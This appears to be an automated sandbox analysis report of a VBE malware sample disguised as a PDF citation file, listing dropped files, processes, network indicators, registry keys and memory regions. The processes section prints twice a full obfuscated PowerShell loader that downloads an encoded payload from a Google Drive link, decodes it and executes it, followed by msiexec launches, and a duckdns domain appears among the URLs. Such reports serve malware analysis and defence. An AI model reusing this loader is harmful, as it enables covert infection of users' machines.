Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
LSMU CITATA LT 20-11-2024#U00b7pdf.vbe
|
ASCII text, with very long lines (356), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkwvzkzk.pd0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sb445qxx.zbf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uiagicxl.y1k.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yafzq4zp.f55.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Malodourously.dar
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis
Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled)
{$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function
Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes
'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro.
UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi
byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel
iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve
n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb,
inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA
Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg
LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re
dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex
BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207
(Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan
pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes
'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR
ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde
)');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn
AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS
en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207
($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periTelle m.gnOvere Albr VokbNab,r PyrdBri,sR.sssDi,ctglasn Parg FloeDelgrIntenSigteAand.Rec,H
FoneAbigaKagedForteDebarl onsalte[Arch$MisdF E,tl PodoCa.hr F uiDfrnsLa gtI aqeSva r,nddnUndeeRainsK.ss]Bu.e=Selv$ eadT .ocrRea
oUrinlSp il .urs');$Udfladnings=Allemandes 'Poly$ A,aW Pa iSvireBenenJeereQuinrSharbOpisr TildCigasAm asVaretDeprnBeswgAb
resikkr Lemn LauePhia.mi,iDfermotek.wT ken Huml orao LivaPresdSorbFHystiUdvelk tee for(Spid$O ivI LiznNonsfSolii UndnStifiSautt
RosiBesvvRadreS yrlKonfyReve,Uno.$DgnaARubrnLa dd HoceNua nJennpBurmrD,sim U oiProte amps nww)';$Andenprmies=$Brisk;Xylotomies207
(Allemandes 'Un.i$ de GTubol ltroDeacbAll aNiobLEpit: C rKUti,l.aadOses VThilnBrugNZym UOpglm etrM CroEWin R Mus= sa.(Ne tTT
nkEOmgjSHestTOutt-Tro,PextraudslTSkriHFlit N,ds$Essea UraNStudDTimbe MesNGhosPHei,rBalkM,onpIAmmeESkjoSUniv)');while (!$Klovnnummer)
{Xylotomies207 (Allemandes 'Borg$.urrgHum lpuncoGe ebOvera Eb,lHead:Par,C PeroShamxJordc ArioUg.lmBrusb,efor.hapiCyaneKry
s aan=c as$M,leBTyp o ErlsPhr tEn,etA,jee R,ar') ;Xylotomies207 $Udfladnings;Xylotomies207 (Allemandes 'PsycsNonet RepAPerorSeptTf,el-NedfSDizelBeneeLoneePetrPTwea
Bri 4');Xylotomies207 (Allemandes ' Rib$C isgUnd.L BlrOd.febTsadaVitaL Ra.:EmbrkSekulRombO ensvChicNdeponMiddu.verm He m NauEKa
pRWarn=skra(p peT eskEFruss TriTH rm- mazpMisuA U sTConthRepr b.n$FagoaRecoNUnf dBredE ygenPivopIm.rRBa emUnbeIBereeD,masUd,r)')
;Xylotomies207 (Allemandes ' Fl,$Dilag Gral coOYohibTa laOutplRipo: Ca SwoulPF ruROdden EngG,funHT ykoSkewv nkeeKommd Fl
eEpidrDecon.rteech rsUrmi=prel$reapgArbeLNonsO K obMissAHjemL Ndv:Dolio otiFk,gefBankSOvercIr.eRFor EBogseBambNP ri+ Flu+
Jus%Mack$NienoForuMGyngSCeduALkkeTTermtAnmeeinsp. Pr C CysO T pUG arnMokkT') ;$Infinitively=$Omsatte[$Sprnghovedernes]}$Thimotheussndsamles=315155;$Desmolase=29732;Xylotomies207
(Allemandes 'Prom$VgtiGAistLIn.eoTinhbraisAUdsklAl e: Fu sRecuLCarcEDre UhomotTessHB stHStruO La UObarN forD Pri Ac e=Demi
TilgtraweMil T Jde-Col cRik o patN Ly,t.rllEForrngadoTSt,l Unad$ SmaamarinDys,dSubeERibeNVagtpWom RTvanML,erIApanEArsmS');Xylotomies207
(Allemandes '.etr$ alig AselPlumoV sabLemmaFeudllogo: Un FUnpaodaddr Dele eoigUnhug.oillRestiAf lnKloogBegreKonfnOmv sM.re
Nic=Graf O t[ CruSMusiyTrubsDisrtSymbeSolbmExci.OverCAreooBul nConsvBegie tavrAnkot ind]Komp: Hea:GlaiFSayerdimhoHogrm emiBInflaFlu
s fore Sam6Spru4 An,SratitTremrFortiBerenJackgD,sl(Ta u$MollSRazzl.ilje Hylu Re t FrshMarehSalboUdflu Monnear,dAfsk)');Xylotomies207
(Allemandes 'Sk n$HoldgAccrLur eO Synbma ta VanL Ti,: onUSt nNefteSPol e Fl CGa srspriEOverTDispE resDBy,n Tra=S ri Hnde[VeinSSnegYMuffS
Pe TDiseeSen MP ot.Ov,rtSti E AflXHom T s,r.Reb e,ysiN RotcK,mpORebaDVoldi Fo.NImplgPelo]J.rd:T et:ImdeaBeaaSRubecLan iBarfiBab,.
islG uneETi nT,oreSMundTBai RIn eiPo,eNRe lGTele(Attr$blanfMis oHatcRTaoieBlyrGSim,GOve l ,eaiEnednSugngR voENonsNAshiSRequ)');Xylotomies207
(Allemandes ' Spi$f lsG ,mplUn ooTropBHalvAKalkLOlie:FusuEZilcU punrOverOOmklp PvtAAfhnmSvibEEnlaSNysgTVo.aEPascRSixpe Pren
CocsCons=Land$ Appu losNGrafSnybeeSpi.c SpdRFrste Rolt bacEH mmdMeth. F,rs RenuBlodBSep SBarnTB nirKoleiParanBa dGDark(Iden$SubfTCrumhpleuIPlanMSaddOK.nsTfla.HGasteMetauR
soSActaSMininS roD RetS SnkABodsmT.kslinteEUnd SEu,r,dolo$ObliD UfoeVagtsSly mxeraoDeneL Amia Acas rseeReor)');Xylotomies207
$Europamesterens;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis
Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled)
{$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function
Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes
'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro.
UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi
byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel
iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve
n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb,
inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA
Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg
LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re
dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex
BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207
(Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan
pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes
'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR
ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde
)');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn
AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS
en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207
($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periTelle m.gnOvere Albr VokbNab,r PyrdBri,sR.sssDi,ctglasn Parg FloeDelgrIntenSigteAand.Rec,H
FoneAbigaKagedForteDebarl onsalte[Arch$MisdF E,tl PodoCa.hr F uiDfrnsLa gtI aqeSva r,nddnUndeeRainsK.ss]Bu.e=Selv$ eadT .ocrRea
oUrinlSp il .urs');$Udfladnings=Allemandes 'Poly$ A,aW Pa iSvireBenenJeereQuinrSharbOpisr TildCigasAm asVaretDeprnBeswgAb
resikkr Lemn LauePhia.mi,iDfermotek.wT ken Huml orao LivaPresdSorbFHystiUdvelk tee for(Spid$O ivI LiznNonsfSolii UndnStifiSautt
RosiBesvvRadreS yrlKonfyReve,Uno.$DgnaARubrnLa dd HoceNua nJennpBurmrD,sim U oiProte amps nww)';$Andenprmies=$Brisk;Xylotomies207
(Allemandes 'Un.i$ de GTubol ltroDeacbAll aNiobLEpit: C rKUti,l.aadOses VThilnBrugNZym UOpglm etrM CroEWin R Mus= sa.(Ne tTT
nkEOmgjSHestTOutt-Tro,PextraudslTSkriHFlit N,ds$Essea UraNStudDTimbe MesNGhosPHei,rBalkM,onpIAmmeESkjoSUniv)');while (!$Klovnnummer)
{Xylotomies207 (Allemandes 'Borg$.urrgHum lpuncoGe ebOvera Eb,lHead:Par,C PeroShamxJordc ArioUg.lmBrusb,efor.hapiCyaneKry
s aan=c as$M,leBTyp o ErlsPhr tEn,etA,jee R,ar') ;Xylotomies207 $Udfladnings;Xylotomies207 (Allemandes 'PsycsNonet RepAPerorSeptTf,el-NedfSDizelBeneeLoneePetrPTwea
Bri 4');Xylotomies207 (Allemandes ' Rib$C isgUnd.L BlrOd.febTsadaVitaL Ra.:EmbrkSekulRombO ensvChicNdeponMiddu.verm He m NauEKa
pRWarn=skra(p peT eskEFruss TriTH rm- mazpMisuA U sTConthRepr b.n$FagoaRecoNUnf dBredE ygenPivopIm.rRBa emUnbeIBereeD,masUd,r)')
;Xylotomies207 (Allemandes ' Fl,$Dilag Gral coOYohibTa laOutplRipo: Ca SwoulPF ruROdden EngG,funHT ykoSkewv nkeeKommd Fl
eEpidrDecon.rteech rsUrmi=prel$reapgArbeLNonsO K obMissAHjemL Ndv:Dolio otiFk,gefBankSOvercIr.eRFor EBogseBambNP ri+ Flu+
Jus%Mack$NienoForuMGyngSCeduALkkeTTermtAnmeeinsp. Pr C CysO T pUG arnMokkT') ;$Infinitively=$Omsatte[$Sprnghovedernes]}$Thimotheussndsamles=315155;$Desmolase=29732;Xylotomies207
(Allemandes 'Prom$VgtiGAistLIn.eoTinhbraisAUdsklAl e: Fu sRecuLCarcEDre UhomotTessHB stHStruO La UObarN forD Pri Ac e=Demi
TilgtraweMil T Jde-Col cRik o patN Ly,t.rllEForrngadoTSt,l Unad$ SmaamarinDys,dSubeERibeNVagtpWom RTvanML,erIApanEArsmS');Xylotomies207
(Allemandes '.etr$ alig AselPlumoV sabLemmaFeudllogo: Un FUnpaodaddr Dele eoigUnhug.oillRestiAf lnKloogBegreKonfnOmv sM.re
Nic=Graf O t[ CruSMusiyTrubsDisrtSymbeSolbmExci.OverCAreooBul nConsvBegie tavrAnkot ind]Komp: Hea:GlaiFSayerdimhoHogrm emiBInflaFlu
s fore Sam6Spru4 An,SratitTremrFortiBerenJackgD,sl(Ta u$MollSRazzl.ilje Hylu Re t FrshMarehSalboUdflu Monnear,dAfsk)');Xylotomies207
(Allemandes 'Sk n$HoldgAccrLur eO Synbma ta VanL Ti,: onUSt nNefteSPol e Fl CGa srspriEOverTDispE resDBy,n Tra=S ri Hnde[VeinSSnegYMuffS
Pe TDiseeSen MP ot.Ov,rtSti E AflXHom T s,r.Reb e,ysiN RotcK,mpORebaDVoldi Fo.NImplgPelo]J.rd:T et:ImdeaBeaaSRubecLan iBarfiBab,.
islG uneETi nT,oreSMundTBai RIn eiPo,eNRe lGTele(Attr$blanfMis oHatcRTaoieBlyrGSim,GOve l ,eaiEnednSugngR voENonsNAshiSRequ)');Xylotomies207
(Allemandes ' Spi$f lsG ,mplUn ooTropBHalvAKalkLOlie:FusuEZilcU punrOverOOmklp PvtAAfhnmSvibEEnlaSNysgTVo.aEPascRSixpe Pren
CocsCons=Land$ Appu losNGrafSnybeeSpi.c SpdRFrste Rolt bacEH mmdMeth. F,rs RenuBlodBSep SBarnTB nirKoleiParanBa dGDark(Iden$SubfTCrumhpleuIPlanMSaddOK.nsTfla.HGasteMetauR
soSActaSMininS roD RetS SnkABodsmT.kslinteEUnd SEu,r,dolo$ObliD UfoeVagtsSly mxeraoDeneL Amia Acas rseeReor)');Xylotomies207
$Europamesterens;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\System32\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
gnsuw4-nsh6-mnsg.duckdns.org
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.google.com/k
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://drive.usercontent.google.comseUr
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 15 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
172.217.19.174
|
||
|
drive.usercontent.google.com
|
142.250.181.1
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.181.1
|
drive.usercontent.google.com
|
United States
|
||
|
172.217.19.174
|
drive.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8C10000
|
direct allocation
|
page execute and read and write
|
|
|
|
A849000
|
direct allocation
|
page execute and read and write
|
|
|
|
298AFCC4000
|
trusted library allocation
|
page read and write
|
|
|
|
5D89000
|
trusted library allocation
|
page read and write
|
|
|
|
8398000
|
heap
|
page read and write
|
|
|
|
1D40D5E1000
|
heap
|
page read and write
|
||
|
3320000
|
trusted library allocation
|
page read and write
|
||
|
298AFF4D000
|
trusted library allocation
|
page read and write
|
||
|
8B7E000
|
stack
|
page read and write
|
||
|
7FF848DA0000
|
trusted library allocation
|
page read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
1D40B96C000
|
heap
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
856D000
|
stack
|
page read and write
|
||
|
2989E1BC000
|
heap
|
page read and write
|
||
|
71D0000
|
heap
|
page execute and read and write
|
||
|
31BE000
|
stack
|
page read and write
|
||
|
8610000
|
trusted library allocation
|
page read and write
|
||
|
298AFC60000
|
trusted library allocation
|
page read and write
|
||
|
1D40B965000
|
heap
|
page read and write
|
||
|
1D40B7F9000
|
heap
|
page read and write
|
||
|
6DC9000
|
remote allocation
|
page execute and read and write
|
||
|
1D40D90A000
|
heap
|
page read and write
|
||
|
4CCE000
|
stack
|
page read and write
|
||
|
DFC75AF000
|
stack
|
page read and write
|
||
|
3B199FB000
|
stack
|
page read and write
|
||
|
2989E340000
|
heap
|
page read and write
|
||
|
23380000
|
direct allocation
|
page read and write
|
||
|
1D40B83F000
|
heap
|
page read and write
|
||
|
86C5000
|
trusted library allocation
|
page read and write
|
||
|
1D40D721000
|
heap
|
page read and write
|
||
|
DFC8B4B000
|
stack
|
page read and write
|
||
|
298A00CE000
|
trusted library allocation
|
page read and write
|
||
|
1D40B83E000
|
heap
|
page read and write
|
||
|
3072000
|
unkown
|
page read and write
|
||
|
298A00E9000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
|
72EE000
|
stack
|
page read and write
|
||
|
732E000
|
stack
|
page read and write
|
||
|
DFC797C000
|
stack
|
page read and write
|
||
|
1D40D94C000
|
heap
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
298A1D8A000
|
trusted library allocation
|
page read and write
|
||
|
2989E440000
|
heap
|
page read and write
|
||
|
2F40000
|
heap
|
page read and write
|
||
|
298A0B5F000
|
trusted library allocation
|
page read and write
|
||
|
1D40B8AF000
|
heap
|
page read and write
|
||
|
829F000
|
unkown
|
page read and write
|
||
|
5D11000
|
trusted library allocation
|
page read and write
|
||
|
3084000
|
unkown
|
page read and write
|
||
|
8398000
|
heap
|
page read and write
|
||
|
8CB0000
|
direct allocation
|
page read and write
|
||
|
8D10000
|
direct allocation
|
page read and write
|
||
|
DFC7AFE000
|
stack
|
page read and write
|
||
|
82F0000
|
direct allocation
|
page read and write
|
||
|
7AB0000
|
trusted library allocation
|
page read and write
|
||
|
298B8340000
|
heap
|
page read and write
|
||
|
80D0000
|
heap
|
page read and write
|
||
|
1D40B960000
|
heap
|
page read and write
|
||
|
298AFF5D000
|
trusted library allocation
|
page read and write
|
||
|
1D40D8EA000
|
heap
|
page read and write
|
||
|
1D40B814000
|
heap
|
page read and write
|
||
|
3081000
|
unkown
|
page read and write
|
||
|
2D18000
|
stack
|
page read and write
|
||
|
8320000
|
heap
|
page read and write
|
||
|
72AE000
|
stack
|
page read and write
|
||
|
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
|
1D40D5FA000
|
heap
|
page read and write
|
||
|
4C70000
|
trusted library allocation
|
page read and write
|
||
|
708E000
|
stack
|
page read and write
|
||
|
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
|
2381C000
|
stack
|
page read and write
|
||
|
1D40B83B000
|
heap
|
page read and write
|
||
|
2989E3E5000
|
heap
|
page read and write
|
||
|
3B193FE000
|
stack
|
page read and write
|
||
|
3314000
|
trusted library allocation
|
page read and write
|
||
|
7B6B000
|
stack
|
page read and write
|
||
|
DFC7B78000
|
stack
|
page read and write
|
||
|
726B000
|
stack
|
page read and write
|
||
|
896F000
|
heap
|
page read and write
|
||
|
88AB000
|
stack
|
page read and write
|
||
|
7FF848D50000
|
trusted library allocation
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
8390000
|
heap
|
page read and write
|
||
|
300C000
|
heap
|
page read and write
|
||
|
89AD000
|
heap
|
page read and write
|
||
|
298A1A09000
|
trusted library allocation
|
page read and write
|
||
|
32E0000
|
trusted library section
|
page read and write
|
||
|
8617000
|
trusted library allocation
|
page read and write
|
||
|
298A0749000
|
trusted library allocation
|
page read and write
|
||
|
8CA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D00000
|
heap
|
page execute and read and write
|
||
|
2989FCD4000
|
trusted library allocation
|
page read and write
|
||
|
7840000
|
heap
|
page read and write
|
||
|
298A01FF000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
8520000
|
trusted library allocation
|
page read and write
|
||
|
333A000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
1D40B8A7000
|
heap
|
page read and write
|
||
|
7FF848B7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
317E000
|
stack
|
page read and write
|
||
|
23CE0000
|
heap
|
page read and write
|
||
|
78F0000
|
heap
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
75F0000
|
heap
|
page read and write
|
||
|
1D40D8FA000
|
heap
|
page read and write
|
||
|
8215000
|
heap
|
page read and write
|
||
|
8510000
|
trusted library allocation
|
page read and write
|
||
|
298B8458000
|
heap
|
page read and write
|
||
|
3300000
|
heap
|
page read and write
|
||
|
1D40D8FA000
|
heap
|
page read and write
|
||
|
23360000
|
direct allocation
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
7712000
|
heap
|
page read and write
|
||
|
30F3000
|
heap
|
page read and write
|
||
|
1D40D8E6000
|
heap
|
page read and write
|
||
|
3360000
|
trusted library allocation
|
page read and write
|
||
|
7F710000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D40B7D0000
|
heap
|
page read and write
|
||
|
8620000
|
trusted library allocation
|
page read and write
|
||
|
7FF848BD0000
|
trusted library allocation
|
page read and write
|
||
|
89B6000
|
heap
|
page read and write
|
||
|
3033000
|
heap
|
page read and write
|
||
|
298A01E7000
|
trusted library allocation
|
page read and write
|
||
|
881C000
|
stack
|
page read and write
|
||
|
2391E000
|
stack
|
page read and write
|
||
|
298B8680000
|
heap
|
page read and write
|
||
|
1D40B8BE000
|
heap
|
page read and write
|
||
|
3310000
|
trusted library allocation
|
page read and write
|
||
|
7810000
|
trusted library allocation
|
page read and write
|
||
|
BC49000
|
direct allocation
|
page execute and read and write
|
||
|
298A01EB000
|
trusted library allocation
|
page read and write
|
||
|
1D40D937000
|
heap
